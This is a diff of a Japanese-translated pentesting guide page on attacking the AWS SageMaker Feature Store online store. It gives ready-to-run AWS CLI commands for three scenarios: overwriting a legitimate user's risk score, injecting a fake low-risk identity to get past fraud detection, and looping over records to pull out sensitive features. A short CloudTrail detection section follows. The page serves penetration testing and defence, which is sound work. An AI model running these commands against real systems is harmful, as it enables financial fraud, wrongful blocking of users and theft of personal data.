Translated ['src/pentesting-cloud/aws-security/aws-post-exploitation/aws

src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md

@@ -1,50 +1,160 @@
 # SageMaker Feature Store online store poisoning
 
-OnlineStore が有効な Feature Group に対して `sagemaker:PutRecord` を悪用し、オンライン推論で消費されるライブの特徴量値を上書きします。`sagemaker:GetRecord` と組み合わせることで、攻撃者は機密性の高い特徴量を読み取ることができます。これはモデルやエンドポイントへのアクセスを必要としません。
+OnlineStore が有効な Feature Group に対して `sagemaker:PutRecord` を悪用し、オンライン推論で消費されるライブの特徴量値を上書きします。`sagemaker:GetRecord` と組み合わせることで、攻撃者は機密性の高い特徴量を読み取り、機密な ML データを exfiltrate できます。これはモデルやエンドポイントへのアクセスを必要としないため、直接的なデータ層攻撃になります。
 
 ## Requirements
 - 権限: `sagemaker:ListFeatureGroups`, `sagemaker:DescribeFeatureGroup`, `sagemaker:PutRecord`, `sagemaker:GetRecord`
-- ターゲット: OnlineStore が有効な Feature Group（通常はリアルタイム推論を支える）
+- 対象: OnlineStore が有効な Feature Group（通常はリアルタイム推論を支えるもの）
+- 複雑さ: **LOW** - 簡単な AWS CLI コマンド、モデル操作は不要
 
 ## Steps
-1) テスト用に小さな Online Feature Group を選択または作成する
+
+### Reconnaissance
+
+1) OnlineStore が有効な Feature Groups を一覧表示する
+```bash
+REGION=${REGION:-us-east-1}
+aws sagemaker list-feature-groups \
+--region $REGION \
+--query "FeatureGroupSummaries[?OnlineStoreConfig!=null].[FeatureGroupName,CreationTime]" \
+--output table
+```
+2) 対象の Feature Group を説明して、そのスキーマを理解する
+```bash
+FG=<feature-group-name>
+aws sagemaker describe-feature-group \
+--region $REGION \
+--feature-group-name "$FG"
+```
+`RecordIdentifierFeatureName`、`EventTimeFeatureName`、およびすべてのフィーチャ定義に注意してください。これらは有効なレコードを作成するために必要です。
+
+### Attack Scenario 1: Data Poisoning (Overwrite Existing Records)
+
+1) 現在の正当なレコードを読み取る
+```bash
+aws sagemaker-featurestore-runtime get-record \
+--region $REGION \
+--feature-group-name "$FG" \
+--record-identifier-value-as-string user-001
+```
+2) インラインの `--record` パラメータを使用してレコードを悪意のある値で汚染する
+```bash
+NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ)
+
+# Example: Change risk_score from 0.15 to 0.99 to block a legitimate user
+aws sagemaker-featurestore-runtime put-record \
+--region $REGION \
+--feature-group-name "$FG" \
+--record "[
+{\"FeatureName\": \"entity_id\", \"ValueAsString\": \"user-001\"},
+{\"FeatureName\": \"event_time\", \"ValueAsString\": \"$NOW\"},
+{\"FeatureName\": \"risk_score\", \"ValueAsString\": \"0.99\"},
+{\"FeatureName\": \"transaction_amount\", \"ValueAsString\": \"125.50\"},
+{\"FeatureName\": \"account_status\", \"ValueAsString\": \"POISONED\"}
+]" \
+--target-stores OnlineStore
+```
+3) 汚染されたデータを検証する
+```bash
+aws sagemaker-featurestore-runtime get-record \
+--region $REGION \
+--feature-group-name "$FG" \
+--record-identifier-value-as-string user-001
+```
+**影響**: ML models consuming this feature will now see `risk_score=0.99` for a legitimate user, potentially blocking their transactions or services。
+
+### 攻撃シナリオ2: Malicious Data Injection (Create Fraudulent Records)
+
+操作されたフィーチャーを持つ完全に新しいレコードを注入して、セキュリティ制御を回避する:
+```bash
+NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ)
+
+# Create fake user with artificially low risk to perform fraudulent transactions
+aws sagemaker-featurestore-runtime put-record \
+--region $REGION \
+--feature-group-name "$FG" \
+--record "[
+{\"FeatureName\": \"entity_id\", \"ValueAsString\": \"user-999\"},
+{\"FeatureName\": \"event_time\", \"ValueAsString\": \"$NOW\"},
+{\"FeatureName\": \"risk_score\", \"ValueAsString\": \"0.01\"},
+{\"FeatureName\": \"transaction_amount\", \"ValueAsString\": \"999999.99\"},
+{\"FeatureName\": \"account_status\", \"ValueAsString\": \"approved\"}
+]" \
+--target-stores OnlineStore
+```
+インジェクションを検証する:
+```bash
+aws sagemaker-featurestore-runtime get-record \
+--region $REGION \
+--feature-group-name "$FG" \
+--record-identifier-value-as-string user-999
+```
+**Impact**: 攻撃者は低リスクスコア (0.01) の偽のアイデンティティを作成し、詐欺検知を発動させることなく高額な不正取引を実行できる。
+
+### Attack Scenario 3: 機密データの持ち出し
+
+複数のレコードを読み取り、機密の特徴量を抽出してモデルの挙動をプロファイリングする:
+```bash
+# Exfiltrate data for known users
+for USER_ID in user-001 user-002 user-003 user-999; do
+echo "Exfiltrating data for ${USER_ID}:"
+aws sagemaker-featurestore-runtime get-record \
+--region $REGION \
+--feature-group-name "$FG" \
+--record-identifier-value-as-string ${USER_ID}
+done
+```
+**影響**: 機密の特徴量（リスクスコア、取引パターン、個人データ）が攻撃者にさらされる。
+
+### テスト/デモ Feature Group Creation (Optional)
+
+If you need to create a test Feature Group:
 ```bash
 REGION=${REGION:-us-east-1}
 FG=$(aws sagemaker list-feature-groups --region $REGION --query "FeatureGroupSummaries[?OnlineStoreConfig!=null]|[0].FeatureGroupName" --output text)
 if [ -z "$FG" -o "$FG" = "None" ]; then
 ACC=$(aws sts get-caller-identity --query Account --output text)
-FG=ht-fg-$ACC-$(date +%s)
+FG=test-fg-$ACC-$(date +%s)
 ROLE_ARN=$(aws iam get-role --role-name AmazonSageMaker-ExecutionRole --query Role.Arn --output text 2>/dev/null || echo arn:aws:iam::$ACC:role/service-role/AmazonSageMaker-ExecutionRole)
-aws sagemaker create-feature-group --region $REGION --feature-group-name "$FG" --record-identifier-feature-name entity_id --event-time-feature-name event_time --feature-definitions "[{\"FeatureName\":\"entity_id\",\"FeatureType\":\"String\"},{\"FeatureName\":\"event_time\",\"FeatureType\":\"String\"},{\"FeatureName\":\"risk_score\",\"FeatureType\":\"Fractional\"}]" --online-store-config "{\"EnableOnlineStore\":true}" --role-arn "$ROLE_ARN"
+
+aws sagemaker create-feature-group \
+--region $REGION \
+--feature-group-name "$FG" \
+--record-identifier-feature-name entity_id \
+--event-time-feature-name event_time \
+--feature-definitions "[
+{\"FeatureName\":\"entity_id\",\"FeatureType\":\"String\"},
+{\"FeatureName\":\"event_time\",\"FeatureType\":\"String\"},
+{\"FeatureName\":\"risk_score\",\"FeatureType\":\"Fractional\"},
+{\"FeatureName\":\"transaction_amount\",\"FeatureType\":\"Fractional\"},
+{\"FeatureName\":\"account_status\",\"FeatureType\":\"String\"}
+]" \
+--online-store-config "{\"EnableOnlineStore\":true}" \
+--role-arn "$ROLE_ARN"
+
 echo "Waiting for feature group to be in Created state..."
 for i in $(seq 1 40); do
 ST=$(aws sagemaker describe-feature-group --region $REGION --feature-group-name "$FG" --query FeatureGroupStatus --output text || true)
-echo $ST; [ "$ST" = "Created" ] && break; sleep 15
+echo "$ST"; [ "$ST" = "Created" ] && break; sleep 15
 done
 fi
-```
-2) オンラインレコードを挿入/上書き (poison)
-```bash
-NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ)
-cat > /tmp/put.json << JSON
-{
-"FeatureGroupName": "$FG",
-"Record": [
-{"FeatureName": "entity_id", "ValueAsString": "user-123"},
-{"FeatureName": "event_time", "ValueAsString": "$NOW"},
-{"FeatureName": "risk_score", "ValueAsString": "0.99"}
-],
-"TargetStores": ["OnlineStore"]
-}
-JSON
-aws sagemaker-featurestore-runtime put-record --region $REGION --cli-input-json file:///tmp/put.json
-```
-3) レコードを読み返して改ざんを確認する
-```bash
-aws sagemaker-featurestore-runtime get-record --region $REGION --feature-group-name "$FG" --record-identifier-value-as-string user-123 --feature-name risk_score --query "Record[0].ValueAsString"
-```
-期待される結果: risk_score が 0.99 を返す (attacker-set)、モデルが使用するオンライン features を変更できることを証明する。
 
-## Impact
-- Real-time integrity attack: エンドポイント/モデルに触れることなく、production models が利用する features を操作する。
-- Confidentiality risk: GetRecord を介して OnlineStore から機密性の高い features を読み取る。
+echo "Feature Group ready: $FG"
+```
+## Detection
+
+Monitor CloudTrail for suspicious patterns:
+- 異常な IAM プリンシパルや IP アドレスからの `PutRecord` イベント
+- 高頻度の `PutRecord` や `GetRecord` 呼び出し
+- 異常な特徴量値を伴う `PutRecord`（例: risk_score が通常の範囲外）
+- 大量の `GetRecord` 操作（大規模なデータ持ち出しを示唆）
+- 通常の業務時間外や予期しない場所からのアクセス
+
+Implement anomaly detection:
+- 特徴量値の検証（例: risk_score は 0.0-1.0）
+- 書き込みパターンの解析（頻度、タイミング、ソースの識別）
+- データドリフト検出（特徴量分布の急激な変化）
+
+## References
+- [AWS SageMaker Feature Store Documentation](https://docs.aws.amazon.com/sagemaker/latest/dg/feature-store.html)
+- [Feature Store Security Best Practices](https://docs.aws.amazon.com/sagemaker/latest/dg/feature-store-security.html)